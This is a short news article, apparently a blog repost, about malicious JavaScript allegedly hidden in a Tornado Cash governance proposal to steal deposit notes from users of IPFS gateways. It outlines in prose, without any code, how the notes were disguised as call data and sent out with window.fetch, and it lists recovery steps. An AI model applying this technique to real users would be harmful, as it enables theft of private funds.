Tornado Cash, a name that stood for privacy, security, and controversy in the crypto community, has just been hit by a concerning revelation. A developer, known among the community as Butterfly Effects, allegedly smuggled malicious JavaScript into a governance proposal, catching everyone off guard. Since the beginning of the year, it appears that anyone who used IPFS gateways to interact with Tornado Cash might have had their deposit notes compromised, sending them straight to a server under the control of the supposed developer.
For the uninitiated, Tornado Cash serves as a non-custodial privacy solution, allowing users to make transactions on the Ethereum network without leaving a trace. This recent exploit revolves around a piece of code that was meant to remain unnoticed. It was designed to snatch deposit notes and funnel them to a private server, all under the guise of a benign governance proposal.
But here’s where things get interesting: the exploit targeted transactions made through IPFS deployments of Tornado Cash. In other words, if you interacted with Tornado Cash using local interfaces, breathe a sigh of relief—you’re in the clear, thanks to the transparency and auditability of direct contract interactions.
The exploit itself is a crafty piece of work. I am actually impressed by the work. Basically, it encodes private deposit notes to masquerade as call data, sneakily using the window.fetch function to transmit this sensitive information to the attacker’s server.
The community discovered the exploit code through platforms like Cloudflare IPFS and its links to a suspicious Ethereum address. However, there’s a silver lining in the form of recovery steps that users and the community can take to safeguard their assets and the integrity of Tornado Cash. One important measure involves switching to a recommended IPFS ContextHash deployment, which could shield users from further harm. This deployment is validated through prior governance proposals.
As usual, the community is rallying together, with entities like ZeroTwoDAO and Gas404 developers advocating for a proactive stance against such exploits. Their call to action is for TORN holders to exercise their voting rights and veto proposals that might harbor malicious code.
Source: https://www.cryptopolitan.com/malicious-code-tornado-cash-governance/